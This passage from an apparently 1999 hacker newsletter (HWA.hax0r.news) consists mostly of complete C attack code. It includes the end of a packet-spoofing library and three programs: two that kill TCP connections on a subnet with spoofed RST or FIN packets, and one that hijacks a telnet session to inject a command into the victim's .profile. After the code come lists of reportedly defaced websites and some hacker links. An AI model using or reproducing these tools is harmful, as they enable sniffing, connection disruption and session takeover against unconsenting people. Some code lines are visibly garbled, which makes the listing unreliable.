break; /* UDP */ default: exit(1); break; }; sp_status = sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0, (struct sockaddr *)&sp_server,sizeof(struct sockaddr)); if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen) { if (sp_status < 0) perror("Sendto"), exit(1); printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, sp->datalen+HEAD_BASE); }; #ifdef DEBUG printf("Packet transmitted...\n"); #endif } void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto) { struct IP_header *sp_help_ip; int HEAD_BASE; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */ default: exit(1); break; }; sp_help_ip = (struct IP_header *) (sp->buffer); sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4); sp_help_ip->type = 0; sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen); sp_help_ip->ID = htons(12545); /* TEST */ sp_help_ip->flag_offset = 0; sp_help_ip->TTL = 69; sp_help_ip->protocol = proto; sp_help_ip->source = sp_getaddrbyname(sp->source); sp_help_ip->destination = sp_getaddrbyname(sp->dest); sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), IP_HEAD_BASE+sp->IP_optlen); #ifdef DEBUG printf("IP header fixed...\n"); #endif } void sp_fix_TCP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct TCP_header *sp_help_tcp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags); sp_help_tcp->seq_nr = htonl(sp->seq); sp_help_tcp->ACK_nr = htonl(sp->ack); sp_help_tcp->source = htons(sp->source_port); sp_help_tcp->destination = htons(sp->dest_port); sp_help_tcp->window = htons(0x7c00); /* dummy for now 'wujx' */ sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 6; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen); memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE); sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen); #ifdef DEBUG printf("TCP header fixed...\n"); #endif } void transmit_TCP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_tcpoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_tcpoptlen); if (sp_datalen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen, sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.seq = sp_seq; sp_struct.ack = sp_ack; sp_struct.flags = sp_flags; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = sp_tcpoptlen; sp_fix_TCP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 6); sp_send_packet(&sp_struct, 6); } void sp_fix_UDP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct UDP_header *sp_help_udp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_udp->source = htons(sp->source_port); sp_help_udp->destination = htons(sp->dest_port); sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE); sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 17; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE); memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE); sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+UDP_HEAD_BASE); #ifdef DEBUG printf("UDP header fixed...\n"); #endif } void transmit_UDP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_data!=NULL) memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = 0; sp_fix_UDP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 17); sp_send_packet(&sp_struct, 17); } /* This routine stolen from ping.c -- HAHAHA!*/ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /************************* Receiving department ****************************/ int open_receiving (char *rc_device, char mode) { int or_fd; struct sigaction rc_sa; int fcntl_flag; struct ifreq ifinfo; char test; /* create snoop socket and set interface promisc */ if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1) perror("Couldn't open Socket."), exit(1); strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device); if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0) perror("Couldn't get flags."), exit(1); ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC; if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0) perror("Couldn't set flags. (PROMISC)"), exit(1); if(mode&IO_HANDLE) { /* install handler */ rc_sa.sa_handler=rc_sigio; /* we don't use signal() */ sigemptyset(&rc_sa.sa_mask); /* because the timing window is */ rc_sa.sa_flags=0; /* too big... */ sigaction(SIGIO,&rc_sa,NULL); } if(fcntl(or_fd,F_SETOWN,getpid())<0) perror("Couldn't set ownership"), exit(1); if(mode&IO_HANDLE) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); rc_fd_abc123=or_fd; } else { if(mode&IO_NONBLOCK) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); }; }; #ifdef DEBUG printf("Reading socket ready\n"); #endif return or_fd; } /* returns 0 when no packet read! */ int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto) { char help_buffer[MTU]; int pack_len; struct IP_header *gp_IPhead; pack_len = read(rc_fd,help_buffer,1500); if(pack_len<0) { if(errno==EWOULDBLOCK) {pack_len=0;} else {perror("Read error:"); exit(1);} }; if(pack_len>0) { pack_len -= DEV_PREFIX; memcpy(buffer,help_buffer+DEV_PREFIX,pack_len); gp_IPhead = (struct IP_header *) buffer; if(proto != NULL) *proto = gp_IPhead->protocol; if(TCP_UDP_start != NULL) *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2; } return pack_len; } void wait_packet_timeout (int sig) { alarm(0); WAIT_PACKET_WAIT_TIME=1; } int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, char *wp_source, unsigned short wp_source_port, char *wp_dest, unsigned short wp_dest_port, int wp_flags, int wait_time) { char wp_buffer[1500]; struct IP_header *wp_iphead; struct TCP_header *wp_tcphead; unsigned long wp_sourcel, wp_destl; int wp_tcpstart; char wp_proto; wp_sourcel=sp_getaddrbyname(wp_source); wp_destl=sp_getaddrbyname(wp_dest); WAIT_PACKET_WAIT_TIME=0; if(wait_time!=0) { signal(SIGALRM,wait_packet_timeout); alarm(wait_time); } while(1) { while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0) { if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;} }; if(wp_proto == 6) { wp_iphead= (struct IP_header *) wp_buffer; wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart); if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) ) { if( (ntohs(wp_tcphead->source)==wp_source_port) && (ntohs(wp_tcphead->destination)==wp_dest_port) ) { if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) ) { ret_values->seq=ntohl(wp_tcphead->seq_nr); ret_values->ack=ntohl(wp_tcphead->ACK_nr); ret_values->flags=ntohs(wp_tcphead->offset_flag)& (URG|ACK|PSH|FIN|RST|SYN); ret_values->datalen = ntohs(wp_iphead->length) - ((wp_iphead->verlen & 0xF) << 2) - ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10); alarm(0); return 0; } } } } } /*impossible to get here.. but anyways*/ alarm(0); return -1; } void close_receiving (void) { close(rc_fd_abc123); } void rc_sigio (int sig) /* Packet handling routine */ { char rc_buffer[1500]; char packet_id [50]; unsigned char *rc_so, *rc_dest; struct IP_header *rc_IPhead; struct TCP_header *rc_TCPhead; int pack_len; if(RC_FILTSET==0) return; if(SP_DATA_BUSY!=0) /* skip this packet */ return; pack_len = read(rc_fd_abc123,rc_buffer,1500); rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX); if(rc_IPhead->protocol!=6) return; /* if not TCP */ rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2)); rc_so = (unsigned char *) &(rc_IPhead->source); rc_dest = (unsigned char *) &(rc_IPhead->destination); sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source), rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination)); if(strcmp(packet_id,rc_filter_string)==0) { SP_DATA_BUSY=1; CUR_SEQ = ntohl(rc_TCPhead->seq_nr); CUR_ACK = ntohl(rc_TCPhead->ACK_nr); CUR_FLAGS = ntohs(rc_TCPhead->offset_flag); CUR_DATALEN = ntohs(rc_IPhead->length) - ((rc_IPhead->verlen & 0xF) << 2) - ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10); CUR_COUNT++; SP_DATA_BUSY=0; } } void set_filter (char *f_source, unsigned short f_source_port, char *f_dest, unsigned short f_dest_port) { unsigned char *f_so, *f_des; unsigned long f_sol, f_destl; RC_FILTSET=0; if(DEV_PREFIX==9999) fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1); f_sol = sp_getaddrbyname(f_source); f_destl = sp_getaddrbyname(f_dest); f_so = (unsigned char *) &f_sol; f_des = (unsigned char *) &f_destl; sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", f_so[0],f_so[1],f_so[2],f_so[3],f_source_port, f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port); RC_FILTSET=1; } ---=[ sniper-rst.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-rst - Example program on connection killing with IP spoofing */ /* Using the RST flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Brecht Claerhout */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-rst sniper-rst.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat,j; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ printf("Trying to terminate the connection\n"); for(i=1;i<=100;i++) { /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5); if(stat==-1) {printf("Connection 5 secs idle or dead...\n");exit(1);} sp_seq=pinfo.ack; sp_ack=0; j=0; /* Sending our fake Packet */ /* for(j=0;j<10;j++) This would be better */ /* { */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq+j,sp_ack,RST); /* } */ /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5); if(stat<0) { printf("Connection 5 secs idle or dead...\n"); exit(0); } } printf("I did not succeed in killing it.\n"); } ------------------------------------------------------------------------------ ---=[ sniper-fin.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-fin - Example program on connection killing with IP spoofing */ /* using the FIN flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Brecht Claerhout */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-fin sniper-fin.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ for(i=1;i<100;i++) { printf("Attack Sequence %d.\n",i); /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; /* Sending our fake Packet */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN); /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) { printf("Killed the connection...\n"); exit(0); } printf("Hmmmm.... no response detected... (retry)\n"); } printf("I did not succeed in killing it.\n"); } ------------------------------------------------------------------------------ ---=[ hijack.c ]=------------------------------------------------------------- /**************************************************************************/ /* Hijack - Example program on connection hijacking with IP spoofing */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - taking control of a running telnet session, and executing */ /* our own command in that shell. */ /* */ /* Author - Brecht Claerhout */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o hijack hijack.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* My spoofing include.... read licence on this */ /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" /* first ethernet device */ #define INTERFACE_PREFIX 14 /* 14 bytes is an ethernet header */ #define PERSONAL_TOUCH 666 int fd_receive, fd_send; char CLIENT[100],SERVER[100]; int CLIENT_P; void main(int argc, char *argv[]) { int i,j,count; struct sp_wait_packet attack_info; unsigned long sp_seq ,sp_ack; unsigned long old_seq ,old_ack; unsigned long serv_seq ,serv_ack; /* This data used to clean up the shell line */ char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a}; char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n"; if(argc!=4) { printf("Usage: %s client client_port server\n",argv[0]); exit(1); } strcpy(CLIENT,argv[1]); CLIENT_P=atoi(argv[2]); strcpy(SERVER,argv[3]); /* preparing all necessary sockets (sending + receiving) */ DEV_PREFIX = INTERFACE_PREFIX; fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, 0); /* normal BLOCKING mode */ printf("Starting Hijacking demo - Brecht Claerhout 1996\n"); printf("-----------------------------------------------\n"); for(j=0;j<50;j++) { printf("\nTakeover phase 1: Stealing connection.\n"); wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; printf(" Sending Spoofed clean-up data...\n"); transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23, sp_seq,sp_ack,ACK|PSH); /* NOTE: always beware you receive y'r OWN spoofed packs! */ /* so handle it if necessary */ count=0; printf(" Waiting for spoof to be confirmed...\n"); while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 1 unsuccesfully ended.\n");} else {printf("Phase 1 ended.\n"); break;}; }; printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n"); count=serv_seq=old_ack=0; while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; if(count!=PERSONAL_TOUCH) {printf("Phase 2 unsuccesfully ended.\n"); exit(0);} printf(" Server SEQ: %X (hex) ACK: %X (hex)\n",serv_seq,serv_ack); printf("Phase 2 ended.\n"); printf("\nTakeover phase 3: Sending MY data.\n"); printf(" Sending evil data.\n"); transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); count=0; printf(" Waiting for evil data to be confirmed...\n"); while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 3 unsuccesfully ended.\n"); exit(0);} printf("Phase 3 ended.\n"); } (c)1999 http://www.real-secure.org/ @HWA H.W Hacked websites March19th-March27th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) For the most part these sites are gleaned from the rumours section of HNN unless otherwise noted and are just that, unconfirmed rumours... Here's a couple I missed last issue/earlier issues; http://www.goodyear.com - via irc (unconf.) And; Date: Fri, 19 Mar 1999 13:19:36 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] Going once, going twice... HACKED! Message-ID: Sender: owner-isn@repsec.com Reply-To: mea culpa Going once, going twice... HACKED! By Adam L. Penenberg eBay, the hot one-to-one auction site, was hacked on Saturday by a 22-year old college student who goes by the handle MagicFX. But the story doesn't end there. The hacker maintains access to the site and can return at will. He has 'root' access to eBay's computers, the same kind the legitimate administrators enjoy. This means he could change prices or place fake ads, divert traffic to other sites or even take down the entire network. This was starkly illustrated to this reporter on Wednesday night, when the hacker, to prove his point, took down eBay's home page for two minutes and replaced it with the message: "by MagicFX "That you can't always trust people - not even huge companies. (who woulda known that?) "It's 9:30 PM do you know who has your credit card information?" (Check out the rest at http://www.forbes.com/tool/html/99/mar/0319/side1.htm) -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] To: InfoSec News Subject: [ISN] Subject: Brazilian Security Forum'99 is hacked Forwarded From: c0nd0r [March 12, Sao Paulo, Brazil] The largest security meeting in the South America was hacked by brazilian group called "Brazilian r00ts". They took control the event's web site, which was located at http://www.mantel.com.br/eventos/security. The Security Forum'99 is the most important event on information security in the South America and its main purpose was discuss vulnerabilities and ways to defeat break-ins. One of the most important guests was Christopher Klaus from ISS, as well as people from Axent. The company responsible for the organization of the event, Mantel, was also hacked (www.mantel.com.br). -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] March 24th From HNN rumours section; Kipling cracked contributed by cluebie I was really trying to ignore this whole mess. First a Belgium garment manufacturer makes extremely disparaging remarks about hackers on its web site. Then it looks like someone may have defaced their web page, then Leander Kahney of Wired Online writes a story about it all that totally screws up the words hacker and cracker. I am kind of surprised that the defaced page has still not been fixed 12 hours later. This whole mess just reeks of marketing. contributed by Anonymous http://www.cablevision.com.ve/ http://www.des-con-systems.com/ contributed by Anonymous Cracked/From HNN Rumours section March 22nd http://www.hackernews.com/ Looks like some people have been rather busy this weekend. This is just a few of the sites which where reported to us as being compromised. http://www.peoplescourt.com http://www.menura.com http://www.thetargetgroup.com http://www.asma-homehealth.com/ http://www.vasodeleche.com/ http://www.home-listings.com/ http://www.cddhcu.gob.mx/ http://www.servnet.com.mx http://www.hallpasstv.com http://www.tocca.com http://www.varsitysoft.com http://www.ashlin.com http://www.superstation.net http://www.bhicorp.com http://www.graydonamerica.com http://www.fusive.com http://www.esiglobal.com http://www.q-time.com http://www.colco.net http://www.frasersfur.com http://www.opf-jamaica.org http://www.webplaza.net From HNN rumours section, March 23rd: http://www.cortroninc.com @HWA _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Featured site: http://www.real-secure.org/ ...... Interesting site check it out, nice layout, cool format, cool info. International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (r) Cruciphux is a trade mark of Hoary Wild Arachnids Inc. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]